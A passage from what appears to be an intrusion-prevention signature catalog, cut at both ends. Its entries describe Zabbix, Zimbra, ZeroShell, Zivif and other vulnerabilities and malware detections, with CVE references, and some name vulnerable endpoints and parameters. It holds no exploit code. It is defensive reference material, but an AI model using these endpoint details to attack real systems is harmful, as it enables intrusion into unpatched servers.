Description: A cross-site scripting vulnerability has been reported for Zabbix. The vulnerability is due to user defined embedded HTML data in the geomap feature of Zabbix. A remote, authenticated user could exploit this vulnerability by configuring malicious data in the Attribution HTML field. Successful exploitation could result in execution of arbitrary code in the context of a victim's browser.
Situation: HTTP_CRL-Zabbix-Geomap-Stored-Cross-Site-Scripting
References:
CVE-2023-29452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29452
Back to top

Zabbix-Server-Active-Proxy-Trapper-Command-Injection

About this vulnerability: A vulnerability in Zabbix
Risk: Moderate
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zabbix
Type: Input Validation
Description: Improper validation of request parameters causes a command injection vulnerability in the Trapper functionality of Zabbix when Auto-discovery or Auto-registration are enabled. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: Generic_CS-Zabbix-Server-Active-Proxy-Trapper-Command-Injection
References:
CVE-2017-2824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2824
BID-98083
http://www.securityfocus.com/bid/98083
Back to top

Zabbix-Server-Active-Proxy-Trapper-Command-Injection-Bypass-CVE-2020-11800

About this vulnerability: An attempt to exploit a vulnerability in Zabbix detected
Risk: High
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Platform: Generic
Software: Zabbix
Type: Input Validation
Description: Zabbix Server 2.2.x and 3.0.x before 3.0.31, and 3.2 allows remote attackers to execute arbitrary code.
Situation: Generic_CS-Zabbix-Server-Active-Proxy-Trapper-Command-Injection
References:
CVE-2020-11800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11800
Back to top

Zabbix-Server-PDF_Report_creator.go-Arbitrary-File-Read

About this vulnerability: A vulnerability in ZABBIX ZABBIX
Risk: Moderate
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Platform: Generic
Software: Zabbix
Type: Input Validation
Description: An arbitrary file disclosure vulnerability has been reported in Zabbix. The vulnerability is due to missing input validation on the url parameter in pdf_report_creator.go. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to a vulnerable Zabbix server. Successful exploitation of this vulnerability could lead to information disclosure from the target server.
Situation: File-Text_Zabbix-Server-PDF_Report_creator.go-Arbitrary-File-Read
References:
CVE-2022-46768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46768
Back to top

Zabbix-Server-Setup.php-Authentication-Bypass-CVE-2022-23134

About this vulnerability: A vulnerability in Zabbix
Risk: High
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Zabbix
Type: Malfunction
Description: A vulnerability in Zabbix, versions 5.4.0 - 5.4.8 and 6.0.0 - 6.0.0beta1, which allows remote attackers to bypass authentication by sending a request with a maliciously crafted session cookie to a vulnerable Zabbix server, due to a design weakness with the initial frontend configuration code in setup.php.
Situation: HTTP_CS-Zabbix-Server-Setup.php-Authentication-Bypass-CVE-2022-23134
References:
CVE-2022-23134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23134
Back to top

Zabbix-SQL-Injection

About this vulnerability: A Zabbix SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zabbix
Type: Insecure Configuration
Description: A vulnerability in Zabbix, vesions 2.0.8 and before, which allows remote attackers to retrieve an active session ID though an SQL injection. This can lead to an authentication bypass and remote code execution.
Situation: HTTP_CSU-Zabbix-SQL-Injection
References:
CVE-2013-5743
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5743
Back to top

Zabbix-Unsafe-Client-Side-Session-Storage-CVE-2022-23131

About this vulnerability: An attempt to exploit a vulnerability in Zabbix detected
Risk: High
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: Zabbix
Type: Input Validation
Description: In the case of Zabbix instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
Situation: HTTP_CSH_Zabbix-Unsafe-Client-Side-Session-Storage-CVE-2022-23131
References:
CVE-2022-23131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23131
Back to top

Zelune-Anonymous-Proxy-Portal

About this vulnerability: List of free anomyous web proxies
Risk: Moderate
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Browser
Description: Zelune is an anonymous proxy portal that can be used to bypass security policies.
Situation: File-Text_Zelune-Access
Back to top

Zen-Cart-Ajax.php-Remote-Code-Execution

About this vulnerability: A vulnerability in Zen Cart
Risk: High
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zen Cart
Type: Input Validation
Description: There is a remote code execution vulnerability in Zen Cart software. The vulnerability can be exploited by non-autheticated remote attackers to compromise a vulnerable system.
Situation: HTTP_CRL-Zen-Cart-Ajax.php-Remote-Code-Execution
References:
CVE-2015-8352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8352
Back to top

Zend-Technologies-Zend-Framework-Zend_XmlRpc-Information-Disclosure

About this vulnerability: A vulnerability in Zend Technologies Zend Framework
Risk: High
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-1754-5242
Platform: Generic
Software: Zend Framework
Type: Malfunction
Description: There is an information-disclosure vulnerability in Zend Technologies Zend Framework. The vulnerability is due to insecure use of the SimpleXMLElement class while parsing XML data. A remote, unauthenticated attacker can leverage this vulnerability by adding an external Entity to XML-RPC requests to open arbitrary files and/or TCP connections. Successful exploitation would result in the disclosure of information from local files.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
References:
CVE-2012-3363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3363
OSVDB-83221
http://www.osvdb.org/83221
Back to top

Zend-Zend-Server-Java-Bridge-Remote-Code-Execution

About this vulnerability: A vulnerability in Zend Technologies Zend Server
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zend Server
Type: Malfunction
Description: A remote code execution vulnerability exists in the Java Bridge server component of Zend Server. The vulnerability is due to design weakness in javamw.jar which does not validate the origin of remote Java commands sent to it. The Java Bridge server listens by default on port TCP/10001. Remote unauthenticated attackers may exploit this vulnerability by sending a specially crafted request to the affected service. Successful attacks would lead to execution of arbitrary code on the target host in the context of SYSTEM on a default installation.
Situation: Generic_CS-Zend-Zend-Server-Java-Bridge-Remote-Code-Execution
References:
BID-47060
http://www.securityfocus.com/bid/47060
Back to top

Zenoss-Core-Version-Check-Remote-Code-Execution

About this vulnerability: A vulnerability in Zenoss Core
Risk: Moderate
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zenoss Core
Type: Malfunction
Description: A remote code execution vulnerability exists in the Zenoss Core Application. The vulnerability is due to unpickling of potentially unsafe Python pickle (serialized) object when checking for software updates from the Zenoss home server. A remote attacker can exploit this vulnerability by first enticing the victim to perform version check on their Zenoss Core application through the admin portal to contact a Zenoss Home server, or by enticing the victim to access a maliciously crafted website when logged in to the admin portal and exploit a cross-site request forgery vulnerability to perform a version check. Then the attacker must perform a man in the middle attack to inject malicious responses to the Zenoss home server response. Successful exploitation could lead to remote execution of arbitrary Python code in the context of the user running the Zenoss application.
Situation: File-Text_Zenoss-Core-Version-Check-Remote-Code-Execution
References:
CVE-2014-6261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6261
OSVDB-115493
http://www.osvdb.org/115493
Back to top

ZenTao-Pro-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in ZenTao Pro
Risk: High
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Platform: Generic
Software: ZenTao Pro
Type: Input Validation
Description: There exists a vulberability in ZenTao Pro, versions 8.8.2 and before, which allows remote attackers to execute arbitrary commands throught the path parameter in a POST to pro/repo-create, due to insufficient user input validation.
Situation: HTTP_CRL-ZenTao-Pro-Remote-Code-Execution
References:
CVE-2020-7361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7361
Back to top

Zenturi-ProgramChecker-sasatl-ActiveX-Control-DebugMsgLog-Method

About this vulnerability: Buffer overflow vulnerability in Zenturi ProgramChecker
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1729-5242
Platform: Windows
Software: Zenturi ProgramChecker
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the sasatl ActiveX control that is part of Zenturi ProgramChecker. The vulnerability is due to a lack of input validation while processing user-supplied parameters for the ActiveX control.
Situation: HTTP_SS-Zenturi-ProgramChecker-sasatl-ActiveX-Control-DebugMsgLog-Method
References:
CVE-2007-2987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2987
BID-24274
http://www.securityfocus.com/bid/24274
OSVDB-36715
http://www.osvdb.org/36715
Back to top

Zenturi-ProgramChecker-sasatl-ActiveX-Control-Fill-Method

About this vulnerability: Buffer overflow vulnerability in Zenturi ProgramChecker
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Zenturi ProgramChecker
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the sasatl ActiveX control that is part of Zenturi ProgramChecker. The vulnerability is due to lack of input validation while processing user-supplied parameters for the ActiveX control.
Situation: HTTP_SS-Zenturi-ProgramChecker-sasatl-ActiveX-Control-Fill-Method
File-Text_Zenturi-ProgramChecker-sasatl-ActiveX-Control-Fill-Method
References:
CVE-2007-3703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3703
BID-24848
http://www.securityfocus.com/bid/24848
OSVDB-37707
http://www.osvdb.org/37707
Back to top

Zenturi-ProgramChecker-sasatl-ActiveX-Control-Scan-Method-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Zenturi ProgramChecker
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Zenturi ProgramChecker
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the sasatl ActiveX control that is part of Zenturi ProgramChecker. The vulnerability is due to lack of input validation while processing user-supplied parameters for the ActiveX control.
Situation: HTTP_SS-Zenturi-ProgramChecker-sasatl-ActiveX-Control-Scan-Method-BOF
File-Text_Zenturi-ProgramChecker-sasatl-ActiveX-Control-Scan-Method-BOF
References:
CVE-2007-3984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3984
BID-25025
http://www.securityfocus.com/bid/25025
OSVDB-36714
http://www.osvdb.org/36714
Back to top

Zeppelin-Ransomware-Infection-Traffic

About this vulnerability: Zeppelin ransomware infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Zeppelin ransomware infection traffic was detected.
Situation: HTTP_CSH-Zeppelin-Ransomware-Infection-Traffic
Back to top

ZeroAccess-Botnet

About this vulnerability: ZeroAccess botnet
Risk: High
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: ZeroAccess is a trojan horse that infects Microsoft Windows operating systems and that is used for click fraud, distributing other malware, and Bitcoin mining. ZeroAccess botnet consists of normal nodes and super nodes, which communicate using a custom P2P protocol.
Situation: Generic_CS-ZeroAccess-Traffic
Generic_UDP-ZeroAccess-P2P-Communication
Generic_UDP-ZeroAccess.B-Traffic
HTTP_CSU-ZeroAccess-Traffic
HTTP_CSH-ZeroAccess-Traffic
Datalength-TCP_ZeroAccess-Traffic
Back to top

Zeromq-Libzmq-Curve-Server-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in ZeroMQ libzmq
Risk: High
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ZeroMQ libzmq
Type: Input Validation
Description: A stack based buffer overflow vulnerability in ZeroMQ libzmq, versions prior to 4.3.1, which allows remote attackers to execute arbitrary code or cause a denial of service conditions by sending a specially crafted packet to the vulnerable service.
Situation: Generic_CS-Zeromq-Libzmq-Curve-Server-Stack-Based-Buffer-Overflow
References:
CVE-2019-13132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13132
Back to top

Zeromq-Libzmq-V2_Decoder-Integer-Overflow

About this vulnerability: A vulnerability in ZeroMQ libzmq
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ZeroMQ libzmq
Type: Integer Overflow
Description: Improper validation of user-supplied data in ZeroMQ libzmq causes an integer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system with the privileges of the process that uses the library.
Situation: Generic_CS-Zeromq-Libzmq-V2_Decoder-Integer-Overflow
References:
CVE-2019-6250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6250
Back to top

ZeroShell-Command-Injection-CVE-2019-12725

About this vulnerability: A vulnerability in ZeroShell
Risk: High
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: ZeroShell
Type: Input Validation
Description: A command injection vulnerability has been reported in ZeroShell 3.9.0. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands.
Situation: HTTP_CRL-ZeroShell-Command-Injection-CVE-2019-12725
References:
CVE-2019-12725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12725
Back to top

ZeroShell-Local-File-Disclosure

About this vulnerability: A vulnerability in ZeroShell
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ZeroShell
Type: Malfunction
Description: There is local file disclosure vulnerability in ZeroShell.
Situation: HTTP_CSU-ZeroShell-Local-File-Disclosure
Back to top

Zeus-Web-Server-File-Read-Vulnerability

About this vulnerability: A vulnerability in Zeus Web server
Risk: Moderate
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zeus Web Server
Type: Input Validation
Description: There exists a file disclosure vulnerability in Zeus Web Server.
Situation: HTTP_CSU-Zeus-Web-Server-File-Read-Vulnerability
References:
CVE-1999-0883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0883
BID-742
http://www.securityfocus.com/bid/742
OSVDB-1126
http://www.osvdb.org/1126
Back to top

Zeus-Zbot-Botnet

About this vulnerability: Zeus/Zbot Botnet
Risk: High
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Zeus aka Zbot is a trojan horse program. Hosts compromised by this trojan form a remote controllable botnet. The controller of the botnet can run arbitrary code on the compromised hosts as well as spy everything the users of the compromised hosts do. There are multiple different Zeus/Zbot botnets in the Internet.
Situation: HTTP_CS-Zeus-Zbot-Botnet-POST-Request-To-CnC
HTTP_CS-Zeus-Post-Request-Detected
HTTP_CS-Zeus-Configuration-File-Download
HTTP_CSH-Zbot-Traffic
HTTP_CSH-Zeus-Botnet-Communication-Detected
HTTP_CSU-Zeus-Zbot-Botnet-Checkin
HTTP_CSU-Zeus-Zbot-Botnet-Update
HTTP_CS-Zeus-Zbot-Botnet-Configuration-Download
HTTP_CS-Zeus-Zbot-Botnet-Possible-Configuration-Download
Back to top

ZGrab-Network-Scanner

About this vulnerability: ZGrab network scanner usage detection
Risk: Low
First detected in: sgpkg-ips-1760-5242
Last changed: sgpkg-ips-1760-5242
Platform: Any Operating System
Software: Any Software
Type: Insecure Configuration
Description: ZGrab is an application layer network scanner.
Situation: HTTP_CSH-ZGrab-Network-Scanner-User-Agent
Back to top

Zimbra-Collaboration-Autodiscover-Servlet-Xxe

About this vulnerability: A vulnerability in Zimbra Collaboration Suite
Risk: High
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: There exists an XML external entity vulnerability in Zimbra Collaboration Suite. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_Zimbra-Collaboration-Autodiscover-Servlet-Xxe
File-TextId_Zimbra-Collaboration-Autodiscover-Servlet-Xxe
References:
CVE-2019-9670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670
Back to top

Zimbra-Collaboration-Calendar-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Zimbra Collaboration Server
Risk: Moderate
First detected in: sgpkg-ips-1483-5242
Last changed: sgpkg-ips-1483-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in Zimbra Collaboration server. This vulnerability is due to insufficient input validation in the Calendar feature. A remote attacker could exploit this vulnerability by enticing the target user to click on a crafted link. Successful exploitation could result in execution of script code in the security context of the target user's browser.
Situation: HTTP_CRL-Zimbra-Collaboration-Calendar-Reflected-Cross-Site-Scripting
References:
CVE-2022-24682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24682
Back to top

Zimbra-Collaboration-Cancelpendingaccountonlyremotewipe-SQL-Injection

About this vulnerability: A vulnerability in Zimbra Collaboration Server
Risk: Moderate
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Input Validation
Description: Improper input validation in the SOAP API causes an SQL injection vulnerability in Zimbra. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Zimbra-Collaboration-Cancelpendingaccountonlyremotewipe-SQL-Injection
References:
CVE-2025-25064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25064
Back to top

Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580

About this vulnerability: A vulnerability in Zimbra Collaboration
Risk: High
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Cross-site Scripting
Description: A cross-site scripting vulnerability has been reported in Zimbra Collaboration 8 before 8.8.15 Patch 41. A remote, unauthenticated attacker could exploit this vulnerability by enticing the target user into clicking a malicious link.
Situation: HTTP_CSU-Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580
File-Text_Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580
References:
CVE-2023-37580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37580
Back to top

Zimbra-Collaboration-Command-Injection-CVE-2024-45519

About this vulnerability: A vulnerability in Zimbra Collaboration
Risk: Critical
First detected in: sgpkg-ips-1785-5242
Last changed: sgpkg-ips-1794-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Input Validation
Description: A command injection vulnerability in Zimbra Collaboration's postjournal service allows arbitrary command execution without authentication.
Situation: SMTP_CS-OpenSMTPD-Command-Injection-CVE-2020-7247
SMTP_CS-Zimbra-Collaboration-Command-Injection-CVE-2024-45519
References:
CVE-2024-45519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45519
Back to top

Zimbra-Collaboration-Cross-Site-Scripting-CVE-2022-27926

About this vulnerability: A vulnerability in Zimbra Collaboration
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Cross-site Scripting
Description: A reflected cross-site scripting vulnerability has been reported in Zimbra Collaboration 9.0.
Situation: HTTP_CSU-Zimbra-Collaboration-Cross-Site-Scripting-CVE-2022-27926
References:
CVE-2022-27926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27926
Back to top

Zimbra-Collaboration-Cross-Site-Scripting-CVE-2023-34192

About this vulnerability: A vulnerability in Zimbra Collaboration
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Cross-site Scripting
Description: A cross-site scripting vulnerability has been reported in Zimbra Collaboration 8.8.15. Succesfully exploiting this vulnerability allows an authenticated attacker to execute arbitrary script content in the context of the target's browser.
Situation: HTTP_CRL-Zimbra-Collaboration-Cross-Site-Scripting-CVE-2023-34192
References:
CVE-2023-34192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34192
Back to top

Zimbra-Collaboration-CVE-2024-50599-Cross-Site-Scripting

About this vulnerability: A vulnerability in Zimbra Collaboration Server
Risk: Moderate
First detected in: sgpkg-ips-1804-5242
Last changed: sgpkg-ips-1804-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Input Validation
Description: Improper validation of user input in the calendar endpoint causes a cross-site scripting vulnerability in Zimbra. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Zimbra-Collaboration-CVE-2024-50599-Cross-Site-Scripting
References:
CVE-2024-50599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50599
Back to top

Zimbra-Collaboration-Mailboxd-External-Entity-Vulnerability

About this vulnerability: A vulnerability in Zimbra Collaboration Server
Risk: High
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Zimbra Collaboration Server
Type: Input Validation
Description: A vulnerability the mailboxd component of Zimbra Collaboration Server, versions 8.7.x before 8.7.11p10, which allows remote attackers to execute arbitrary code due to the insufficient sanitization of user input.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
References:
CVE-2019-9670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670
Back to top

Zimbra-Collaboration-Mboximport-Directory-Traversal-CVE-2022-27925

About this vulnerability: A vulnerability in Zimbra Collaboration Server
Risk: High
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Directory Traversal
Description: A directory traversal vulnerability has bee reported in Zimbra Collaboration. The vulnerability is due to improper validation of zip files uploaded to the mboximport endpoint. A remote, unauthenticated attacker could exploit this vulnerability by uploading a crafted zip file to the target server. Successful exploitation could result in the attacker writing files outside of the expected document root, in the worst case, leading to arbitrary code execution under the security context of the server process.
Situation: File-Member-Name_Zimbra-Collaboration-Mboximport-Directory-Traversal-CVE-2022-27925
References:
CVE-2022-27925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27925
Back to top

Zimbra-Collaboration-Memcached-Command-Injection-CVE-2022-27924

About this vulnerability: A vulnerability in Zimbra Collaboration
Risk: High
First detected in: sgpkg-ips-1490-5242
Last changed: sgpkg-ips-1498-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Input Validation
Description: A CRLF injection vulnerability has been reported in Zimbra Collaboration server. This vulnerability is due to insufficient sanitization of CRLF characters in HTTP Request-URIs and HTTP header values when performing route caching using Memcached. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could allow an attacker to inject arbitrary Memcached commands which would be executed by the server.
Situation: HTTP_CS-Zimbra-Collaboration-Memcached-Command-Injection-In-Authorization-Header-CVE-2022-27924
HTTP_CSU-Zimbra-Collaboration-Memcached-Command-Injection-In-Path-CVE-2022-27924
HTTP_CSU-Zimbra-Collaboration-Memcached-Command-Injection-In-Query-CVE-2022-27924
HTTP_CSH-Zimbra-Collaboration-Memcached-Command-Injection-In-CookieCVE-2022-27924
References:
CVE-2022-27924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27924
Back to top

Zimbra-Collaboration-Proxy-Servlet-SSRF-CVE-2024-45518

About this vulnerability: A vulnerability in Zimbra Collaboration Server
Risk: Moderate
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Input Validation
Description: A server side request forgery vulnerability has been reported in Zimbra Collaboration. The vulnerability is due to insufficient validation of the target domains processed by the Proxy Servlet, combined with an easy-to-make misconfiguration. An authenticated attacker could exploit this vulnerability by enticing a target user to click a crafted link, or sending a crafted request to the server. Successful exploitation could result in unauthorized access to the internal services, potentially allowing for arbitrary command execution.
Situation: HTTP_CSU-Zimbra-Collaboration-Proxy-Servlet-SSRF-CVE-2024-45518
References:
CVE-2024-45518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45518
Back to top

Zimbra-Collaboration-Server-Local-File-Inclusion

About this vulnerability: A vulnerability in Zimbra Collaboration Server
Risk: Moderate
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Directory Traversal
Description: A local file include vulnerability has been reported in Zimbra Collaboration Server. The vulnerability is due to insufficient validation of user-supplied input. A remote attacker can exploit this vulnerability to retrieve sensitive information like LDAP root credentials.
Situation: HTTP_CSU-Zimbra-Collaboration-Server-Local-File-Inclusion
References:
CVE-2013-7091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7091
BID-64149
http://www.securityfocus.com/bid/64149
OSVDB-100747
http://www.osvdb.org/100747
Back to top

Zimbra-Collaboration-Suite-Cross-Site-Scripting-CVE-2018-6882

About this vulnerability: A vulnerability in Zimbra Collaboration Suite
Risk: High
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1594-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Input Validation
Description: A cross site scripting vulnerability has been reported in Zimbra Collaboration Suite. The vulnerability is due to insufficient input validation when handling Content-Location headers in emails.
Situation: E-Mail_Zimbra-Collaboration-Suite-Cross-Site-Scripting-CVE-2018-6882
References:
CVE-2018-6882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6882
Back to top

Zip-Archive

About this vulnerability: Zip archive
Risk: Low
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WinZip
Type: Insecure Configuration
Description: Zip is a widely used achive format developed by PKWARE, Inc. in 1989. These archives may be used to import executable content into the target system.
Situation: E-Mail_BS-Zip-Archive-Transfer
HTTP_SS-Zip-Archive-Download
File-Zip_Archive-Detected
Back to top

Zivif-Camera-iptest.cgi-Blind-RCE

About this vulnerability: An attempt to exploit a vulnerability in Zivif Cameras
Risk: High
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Platform: Generic
Software: Zivif Camera
Type: Input Validation
Description: There exists a vulberability in Zivif Cameras, versions v2.3.4.2103 and before, which allows remote attackers to execute arbitrary commands throught the -url parameter to cgi-bin/iptest.cgi, due to insufficient user input validation.
Situation: HTTP_CS-Zivif-Camera-iptest.cgi-Blind-RCE
References:
CVE-2017-17105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17105
Back to top

ZK-Framework-AuUploader-Authentication-Bypass-CVE-2022-36537

About this vulnerability: An attempt to exploit a vulnerability in ZK Framework detected
Risk: High
First detected in: sgpkg-ips-1561-5242
Last changed: sgpkg-ips-1561-5242
Platform: Generic
Software: ZK Framework
Type: Input Validation
Description: ZK Framework AuUploader servlets contain an unspecified vulnerability that could allow an attacker to retrieve the content of a file located in the web context. The ZK Framework is an open-source Java framework. This vulnerability can impact multiple products, including but not limited to ConnectWise R1Soft Server Backup Manager.
Situation: HTTP_CRL-ZK-Framework-AuUploader-Authentication-Bypass-CVE-2022-36537
HTTP_CRL-ZK-Framework-Potential-AuUploader-Authentication-Bypass-CVE-2022-36537
References:
CVE-2022-36537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36537
Back to top

Zlib-Denial-Of-Service-CVE-2004-0797

About this vulnerability: A vulnerability in zlib Software ZLib Compression Library
Risk: Moderate
First detected in: sgpkg-ips-947-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: zlib
Type: Malfunction
Description: There exists a denial of service vulnerability in zlib Software ZLib Compression Library 1.2.0 and zlib Software ZLib Compression Library 1.2.1.
Situation: File-Binary_Zlib-Denial-Of-Service-CVE-2004-0797
References:
CVE-2004-0797
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0797
BID-11051
http://www.securityfocus.com/bid/11051
Back to top

Zlib-Library-inflateGetHeader-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in the decompression component of the zlib compression library.
Risk: High
First detected in: sgpkg-ips-1506-5242
Last changed: sgpkg-ips-1506-5242
Platform: Generic
Software: zlib
Type: Buffer Overflow
Description: A buffer overflow vulnerability in the decompression component of the zlib compression library, versions 1.2.12 and prior, which allows remote attackers to execute arbitrary code by sending a crafted request or file to a target application.
Situation: File-Binary_Zlib-Library-inflateGetHeader-Handling-Buffer-Overflow
References:
CVE-2022-37434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434
Back to top

Zlip-DNS-Violations

About this vulnerability: Zlip dns protocol violations
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic DNS server
Type: Malfunction
Description: The attack tool zlip sends dns requests that contain various protocol violations. These violations may crash applications that see the request.
Situation: DNS-UDP_Zlip-Compression-Pointer-DoS-1
DNS-UDP_Zlip-Compression-Pointer-DoS-2
DNS-UDP_Zlip-Compression-Pointer-DoS-3
Back to top

Zloader-Malware-C2-Traffic

About this vulnerability: Zloader malware activity detected
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: Zloader
Type: Backdoor
